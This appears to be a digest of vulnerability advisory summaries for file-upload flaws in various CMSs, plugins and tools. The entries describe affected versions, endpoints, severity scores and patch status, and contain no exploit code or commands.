Unrestricted file upload in GreenCMS up to version 2.3 via the pluginAddLocal function in /index.php?m=admin&c=custom&a=pluginadd allows authenticated remote attackers to upload arbitrary files, leading to potential remote code execution. The vulnerability affects only unsupported legacy versions. Publicly available exploit code exists, and the CVSS vector confirms network-accessible exploitation requiring low privileges.

Remote code execution in Drag and Drop File Upload for Contact Form 7 plugin (≤1.1.3) allows unauthenticated attackers to upload arbitrary PHP files via a sanitization bypass vulnerability. The flaw exploits a race condition where file extension validation occurs on unsanitized input while the file saves with a sanitized extension, enabling special characters like '$' to be stripped mid-process. Exploitability is constrained by .htaccess restrictions and filename randomization, reducing real-world risk despite the 8.1 CVSS score. EPSS data not available; no active exploitation or POC publicly confirmed at time of analysis.

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.

Remote code execution in Borg SPM 2007 allows unauthenticated attackers to upload and execute web shell backdoors via unrestricted file upload vulnerability. This discontinued product (sales ended 2008) remains exploitable over the network with no authentication required, enabling full server compromise. CVSS 9.3 (Critical) with network vector, low complexity, and no privileges required. EPSS and KEV data not available for this CVE, but the trivial attack requirements (AV:N/AC:L/PR:N/UI:N) indicate high exploitability if exposed systems exist.

Arbitrary file upload in Breeze Cache for WordPress allows unauthenticated remote attackers to upload malicious files and achieve remote code execution on vulnerable servers. Exploitation requires the non-default 'Host Files Locally - Gravatars' feature to be enabled. While CVSS rates this 9.8 critical, real-world exposure is limited by the disabled-by-default configuration requirement. No public exploit code or CISA KEV listing identified at time of analysis, though Wordfence threat intelligence has disclosed technical details including vulnerable code paths.

IBM Security Verify Directory (Container) versions 10.0.0 through 10.0.0.3 fails to validate uploaded file types, allowing privileged users to upload malicious files that can be distributed to victims for lateral attacks. The vulnerability requires high-privilege credentials but enables integrity compromise and partial availability impact once exploited.

Unauthenticated remote attackers can upload arbitrary files to any path in a+HCM developed by aEnrich, including executable HTML documents, enabling cross-site scripting and potential server-side impacts. The vulnerability requires user interaction (UI:A) but allows unrestricted file placement with low scope and integrity impact. No patch version or active exploitation data is currently available.

Remote code execution in Visitor Management System 1.0 allows authenticated administrators to upload PHP webshells via two unvalidated file upload endpoints (admin_user_insert.php and update_1.php). The move_uploaded_file() function lacks MIME type, extension, and content validation, enabling direct server compromise. Public proof-of-concept exists (SSVC exploitation: POC). EPSS data not available, but the combination of network-accessible attack vector (AV:N) and total technical impact (SSVC) against a specific niche product suggests targeted exploitation risk rather than widespread automated attacks.

Remote code execution in Vvveb CMS 1.0.8 allows authenticated attackers with low privileges to upload PHP webshells disguised with .phtml extensions, bypassing file type restrictions to achieve full server compromise. The vulnerability stems from inadequate file upload validation in the media handler, enabling malicious files in publicly accessible directories. Upstream fix available via GitHub commit; EPSS data unavailable, no CISA KEV listing at time of analysis.

Remote code execution in Vvveb CMS v1.0.8 allows authenticated administrators to execute arbitrary system commands as www-data via a two-stage file upload attack. Attackers exploit a logic flaw in the media management file rename handler that fails to block .php and .htaccess extensions, enabling MIME type manipulation followed by PHP code execution. VulnCheck published an advisory and GitHub commit 6fb8eaa confirms upstream fix. No EPSS data available; no active exploitation confirmed at time of analysis.

Remote code execution in OpenMage Magento LTS versions before 20.17.0 allows authenticated attackers to upload executable PHP files through product custom options by bypassing an incomplete file extension blocklist. The vulnerability exists because the upload filter only blocks `.php` and `.exe` extensions, permitting alternative PHP-executable extensions like `.phtml`, `.phar`, `.php3-.php7`, and `.pht`. Uploaded files land in the publicly accessible `media/custom_options/quote/` directory, enabling code execution on servers without explicit script execution restrictions. No active exploitation confirmed (not in CISA KEV), but public disclosure via GitHub Security Advisory increases exploitation likelihood. EPSS data not provided.

pip before version 26.1 incorrectly treats concatenated tar and ZIP archives as ZIP files regardless of filename, potentially installing unintended package contents when ambiguous archive formats are processed. Local attackers with user interaction can exploit this during package installation to cause integrity confusion, where an archive's actual contents diverge from its declared format. The vulnerability requires local access and user interaction (downloading/installing a crafted archive), limiting real-world impact to supply-chain scenarios or direct social engineering of pip users.

Z-BlogPHP 1.7.5 allows authenticated remote attackers with administrative privileges to upload arbitrary files via the App::UnPack function in the ZBA File Handler component (/zb_users/plugin/AppCentre/app_upload.php), bypassing file upload restrictions and potentially enabling remote code execution. Public exploit code exists, and the vendor has not responded to early disclosure attempts.

OS command injection in Progress LoadMaster and related ADC products allows authenticated administrators with 'All' permissions to execute arbitrary commands via malicious WAF rule file uploads. The attacker exploits unsanitized input during the file upload process in the web UI. With CVSS 8.4 and scope change to 'Changed', successful exploitation enables complete system compromise beyond the vulnerable component. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis. EPSS data not available for risk assessment.

Remote authenticated path traversal in SonicCloudOrg sonic-server up to version 2.0.0 allows attackers with low-level privileges to manipulate the Type parameter in the File Upload Endpoint (FileTool.java) to traverse the filesystem and read or write arbitrary files. The vulnerability has publicly available exploit code and affects all versions up to 2.0.0; the vendor has not responded to early disclosure attempts, leaving no patch available.

DjangoBlog versions up to 2.1.0.0 use a hard-coded cryptographic key in djangoblog/settings.py when the SECRET_KEY argument is manipulated during file upload operations, allowing remote attackers with user interaction to obtain sensitive information. The attack requires high complexity and user participation, resulting in a low confidentiality impact (CVSS 2.3). Publicly available exploit code exists, though the vendor has not responded to disclosure attempts.

Unrestricted file upload in rickxy Hospital Management System allows remote unauthenticated attackers to upload malicious files via the /backend/admin/his_admin_account.php endpoint, leading to potential remote code execution, data exfiltration, or system compromise. Public exploit code exists (GitHub), significantly lowering exploitation barrier. The product uses rolling releases with no fixed versioning, complicating patch tracking. CVSS 7.3 with EPSS not provided, but publicly available POC elevates real-world risk.

Unrestricted file upload in Langflow (langflow-ai) versions up to 1.1.0 allows remote unauthenticated attackers to upload arbitrary files via the create_upload_file API endpoint, potentially leading to remote code execution, data manipulation, and service disruption. Publicly available exploit code exists (CVSS:3.1 E:P) with GIST-hosted POC, elevating immediate risk. Vendor unresponsive to disclosure at time of publication.

EyouCMS versions up to 1.7.1 allow high-privileged attackers to upload arbitrary files via manipulation of the filename parameter in the edit_adminlogo function, leading to information disclosure and potential code execution. The vulnerability requires authenticated admin access and is publicly exploitable with proof-of-concept code available on GitHub; the vendor has not responded to disclosure attempts.

Remote code execution in CMP - Coming Soon & Maintenance Plugin by NiteoThemes for WordPress (versions ≤4.1.16) allows authenticated attackers with Administrator-level privileges to upload and execute arbitrary PHP code via a malicious ZIP file. The vulnerability stems from insufficient capability checking (publish_pages instead of manage_options) and absent file validation in the cmp_theme_update_install AJAX action. CVSS 8.8 reflects high impact across confidentiality, integrity, and availability. No CISA KEV listing or public exploit code identified at time of analysis, suggesting limited real-world exploitation despite the high severity rating. Wordfence Threat Intelligence disclosed this vulnerability with detailed source code references.

File upload validation bypass in Postiz social media scheduler (versions before 2.21.6) allows authenticated users to upload executable file types (HTML, SVG) with spoofed Content-Type headers, achieving stored XSS when nginx serves files using their original extensions. Attackers can hijack sessions and take over other user accounts. CVSS 8.9 (High) reflects network attack vector with low complexity requiring only low-privilege authentication and user interaction. EPSS data not provided. Not listed in CISA KEV. Vendor patch released in version 2.21.6.

Reflected cross-site scripting (XSS) in Stirling-PDF versions before 2.0.0 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by uploading a file with a malicious filename containing script code. The vulnerability affects multiple file upload endpoints that render user-supplied filenames directly into HTML via unsafe DOM manipulation methods without sanitization. Attack requires user interaction (victim must upload the crafted file), limiting real-world impact. No public exploit code or active exploitation has been identified at time of analysis.